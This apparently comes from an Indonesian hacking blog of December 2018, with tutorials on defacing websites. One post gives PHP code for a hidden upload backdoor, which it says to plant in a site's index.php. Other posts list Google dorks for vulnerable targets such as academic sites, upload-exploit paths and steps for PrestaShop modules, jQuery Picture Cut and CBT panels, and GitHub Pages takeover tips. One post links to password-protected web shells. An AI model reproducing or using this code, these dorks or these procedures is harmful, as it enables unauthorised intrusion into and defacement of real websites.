Minggu, 30 Desember 2018

Membuat Hidden Uploader

on Desember 30, 2018 with Tidak ada komentar

Hidden Uploader
Script PHP

Yosh dimalem taun baru ini gw mau kasih tutorial cara membuat hidden uploader.. Keuntungan pke hidden uploader adalah akses kita gak gampang ketikung alias kehapus:V".. Ok lngsng aja simak :

Copas Script nya dulu ;

<?php

if(isset($_GET["uploader"]))

{

echo"<font color=#ffffff>".php_uname()."";

print "\n";$disable_functions = @ini_get("disable_functions");

echo "<br>DisablePHP=".$disable_functions; print "\n";

echo"<br><form method=post enctype=multipart/form-data>";

echo"<input type=file name=f><input name=k type=submit id=k value=upload><br>";

if($_POST["k"]==upload)

{ if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){

echo"<b>".$_FILES["f"]["name"];

}else{

echo"<b>Gagal upload cok";

}

Kemudian tempel script nya dibagian file "index.php" atau apalah.. Kemudian cara aksesnya "http://webnya.cuk/?uploader" kalaw kalian sisipkan difile lain bkn diindexnya yah tinggal "http://webnya.cuk/filekalian?uploader"

Sampai sini dulu gw.. Selamat mencoba dan selamat tahun baru..

#happy new years

#happy hacking deface page

Deface Poc Edit Artikel

on Desember 24, 2018 with Tidak ada komentar

Deface Metode
Regmem / Edit Artikel

Assalamualaikum,, malem ini gw mau kasih tutorial deface metode edit artikel,, bisa dibilang metode ini mirip dengan regmem ,, cmn kalaw metode regmem kita harus upshell ,, sedangkan ini kita cmn edit" aja,, gk ush pnjng lebar lngsng aja gan

DORK :

-inurl:/register site:ac.id

-inurl:/register penulis site:ac.id

AKUN GMAIL

SCRIPT DEFACE

Pertama Kita Dork Dulu Digoogle Kek Biasanya

Kedua Kalaw Sudah Nemu Target Silahkan Regrister/Daftar,,

Ketiga Isi Terserah Semuanya Kecuali : USER, PASS dan AKUN GMAIL..

Keempat Kalaw Sudah Regristrasi Silahkan Cek Akun Gmail kalian,, Kemudian Kalian aktifin dulu akun kalian,,

Kelima Tinggal Login,, Gunakan USER & PASS Yang Kalian Buat Tadi,,

Terakhir Tinggal Cari Tulisan "add artikel" Atau Apalah,, Kemudian Tinggal Tulis" Ajah,,

Done Bukan?,, Yah Walaupun Kgk Upshell Yg Penting Kan Deface juga,, Btw Gw Kasih Tau juga Kalaw Metode Ini Gk Bisa Dimirror rin,, mheuwheuwheuwuehuweuh Thankss Udh Baca,,

KUMPULAN SHELL BACKDOOR

on Desember 14, 2018 with 8 komentar

Shell Backdoor

2019 New

Yosh makasih udh sering" kunjungi blog sederhana gw.. Kali ini gw mau kasih beberapa shell backdoor yg fiturnya lumayan mantap.. Mulai dari yg mini sampe yg big:V".. Emng sengaja kgk gw encript buat lu semua bljr... Klaw gw kasih tpi gw encipt tu sama aja pamer ea Bkn berbagi.. Makasih juga buat 5YN15T3R_742 yg selalu bantu gw.. mhewheaauwhwuww ok chmod lngsng aja gan..

1. 404 Not Found SHELL

Raw : Disini

Download : Disini
Pass: 404

2. GOD SHELL

Raw : Disini
Download : Disini
Pass: GOD

3. Genji Mini SHELL

Raw : Disini
Download : Disini

4. Anime SHELL

Raw : Disini
Download : Disini
Pass: WIBU

5. TIREXSHELL

Download : Disini
Pass: ngasalshell

6. FEAT SHELL

Raw : Disini
Download : Disini

Okok mantap bukan?? Mangga didownload trs dipelajari.. Direcode juga gpp kok tpi jangan lupa share:V"..
Sekian dari gw.. Thankss

DEFACE RESPONSIVE PRESTASHOP 1.6 ARBITRARY FILE UPLOAD

on Desember 08, 2018 with Tidak ada komentar

CARA DEFACE METODE

RESPONSIVE PRESTASHOP 1.6 ARBITRARY FILE UPLOAD

Selamat pagi defacer" indo.. Balik lagi diblog gagah nan mempezona:V".. Kali ini gw mau kasih tutorial deface dengan metode prestashop 1.6 arbitrary file upload... Btw nih nama metode apa nama plat nomer susah amat:V"... Wkwkwkwkkwk... Okok lngsng aja bahan - bahannya :

- Dork

1. inurl:/modules/columnadverts/

2. inurl:/modules/homepageadvertise/

3. inurl:/modules/productpageadverts/ 4. inurl:/modules/simpleslideshow/

5. inurl:/themes/warehouse/

- Exploit

(http://weblu/path/namamodelus/uploadimage.php)

- CSRF klik sini

- Script Deface + Shell Backdoor

Langkah - langkahnya :

1. Kita dork dulu cem biasana digoogle

2. Kemudian pilih salah satu webnya.. Kalaw vuln ada tulisan "error"..

3. Kalaw sudah nemu vuln kek gitu.. Pergi ke csrf .. Isi post filenya dengan "userfile" kemudian submit..

4. Setelah submit nanti pasti ada tempat upload dibawahnya.. Tinggal upload sc/shell kalian..

5. Kalaw upload tan kalian sukses nnti akan ada tulisan "succes:filekalian"..

6. Last cara manggilnya tambahin /slides/filekalian dibelakang websitenya...

Mhuehwuwhwuwhuh selesai gan.. Kalaw kurang paham chat aja :v.. Dan Jangan lupa

#Share & Coment ✌

Deface JQuery Picture Cut With Csrf

on Desember 03, 2018 with 5 komentar

Cara Deface JQuery Picture Cut

with Csrf Shell Upload

Malem semuanya kali ini gw mau kasih tutorial deface JQuery Picture Cut dengan csrf file upload... Metode ini bisa dibilang metode baru gan.. Soalnya baru ditemukan beberapa minggu yg lalu.. Ok langsng aja gk ush bnyk obrol:V".. Bahan :

- Dork

~ intext:/jquery.picture.cut/ "index of"

~ inurl:/jquery.picture.cut site:. com

~ intext:"jquery.picture.cut"+"upload.php"

- Exploit

~ http://webco.li/patch/src/php/upload.php

- Csrf chmod sini

- Shell Backdoor & Script deface

- Ketamvanan

Pertama Kita dork dulu digoogle seperti biasa..

Kedua kalaw vuln webnya ada tulisan "request method is invalid"...

Ketiga kalaw sudah nemu web vulnnya pergi ke csrfnya.. Isi post filenya dengan files[]..

Keempat kunci target kemudian upload shell kalian..

Terakhir kalaw shell kalian suskses diupload nanti tandanya ada tulisan "Error : fornato de arquivo descc"..

Mpsssh cara liat akses shell kalian http://webco.li/shellkalian.php... Setelah itu tinggal kita tebas index dah:V"..

Waduu gampang bukan? Yaiyalah ... Mheuwwuwwhuhw.. Segini dulu dari gw.. Sampe ketemu ditutor selanjutnya Jangan lupa share dan coment gan:V"..

Tips Bermanfaat Metode Take Over

on Desember 02, 2018 with Tidak ada komentar

Tips Deface Metode

Take Over

Hai Hai .. Kali ini gw mau kasih tips yg berfaedah banget buat kalian defacer-defacer indo pencari surga:V".. Mngkin kalian pernah kesususahan saat mencari target take over github bukan??.. Mngkin kalian pernah ngedork berjam- jam tpi gk nemu nemu hasil bukan??.. Jangan risau .. FALKA gans akan kasih tipsnya;(*.. Lngsng aja chmod :

Pertama kita buka dulu reverse ip Klik sini atau Disini Juga Bisa gan..

Kedua masukan target web dengan nama "pisikita.com" dan cari..

Ketiga pasti akan keluar bnyk target dan rata" masih vuln alias perawan:V"..

Terakhir kita copy salah satu web yg kita inginkan untuk kita cek 404 github pages enggk.. Kemudian tempel dan cek webnya di Disini Gan ...

Lah kalaw ada yg 404 gitu berarti tandanya vuln take over:V".. Tinggal kita eksekusi doank done:V"..

Okok sekian dulu dari gw.. Thanks

#Share And Coment

Cara Merubah Smartphone Part II

on November 24, 2018 with Tidak ada komentar

Cara Merubah Smartphone

Layaknya Seorang Hacker

Siapa yg tidak mengerti arti kata dari hacker? Yahh kita semua tau dan mengerti.. Hacker adalah orang yang mempelajari, menganalisis, memodifikasi, menerobos masuk ke dalam komputer dan jaringan komputer, baik untuk keuntungan atau dimotivasi oleh tantangan.. Menurut gw menjadi seorang hacker sendiri adalah idola bagi setiap orang.. Dan dibutuhkan waktu yg lama dan skill yg mempuni untuk menjadi seorang hacker...

Tapi jangan risau kali ini gw akan kasih tips buat kalian yg ngebet banget ingin jadi kek hacker..

- Pertama kalian download dulu apknya Disini Gan..

- Kedua kalian pasang aplikasinya..

- Ketiga jika ingin membuka aplikasi ketik nama aplikasinya dan enter ..

- Terakhir saatnya pamer ke temen" kalian.. Kalaw hp smartphone kalian udh berubah layaknya seorang hacker proo:V"..

Gw Kasih Tampilan Aplikasinya Biar Makin Semangat Kalian Pamernya:V"..

Cara Merubah Smartphone Part I

on November 12, 2018 with 1 komentar

Cara Merubah Smartphone

Layaknya Komputer

Sebenernya merubah smartphone seperti komputer memilik bnyak cara gan.. Salah satunya RDP yg biasanya digunakan untuk ngedump dan digunakan untuk keperluan hacking lainnya.. Sayang caranya lumayan susah dan ribet.. Tapi tenang gan kali ini gw kasih apk yg lumayan ringan dan mantap buat merubah smartphone kalian..

Berbeda dengan apk dan launcher lain Andromium OS dapat berjalan lancar pada prosesor Snapdragon 800 atau diatasnya dengan menggunakan ram 2GB serta monitor dengan resolusi 1080p. Hanya saja dibutuhkan Android Lollypop atau versi terbaru..

Ok langsng aja :

Pertama download apknya Disini

Kedua download dan pasang aplikasinya

Ketiga buka aplikasinya kemudian berikan akses “App Usage Access” cukup klik tombol “Ok”..

Keempat kita perlu memberikan akses untuk Notifikasi Andromium..

Terakhir setelah download.. Setelah Memberi akses.. Dan setelah Memberi notifikasi tinggal teken "OK".. Kemudian cek notifikasi bar kalian dan klik andromiumnya dan nikmati hp kalian layaknya komputer..

Mheueheuehuehuh Mantap Gan.. Jangan lupa share dan koment

Deface Poc CBT

on November 06, 2018 with Tidak ada komentar

Deface Poc
Computer Based Tested

Yahhh Deface Metode CBT.. Metode ini lumayan susah gan karna nyari web vulnnya itu ibarat nyari jarum diatas jerami:V".. Tpi kalaw dorknya lu kembangin insyallah lu akan dapet web fresh.. look aja lngsng :

- Dork

CBT inurl:pages/login.php

inurl:/panel/pages/login.php

- Exploit

http://webco.li/path/panel/pages/upload_video.php

- Script deface

- Shell Backdoor

Langkah awal kita dork digoogle kek biasanya..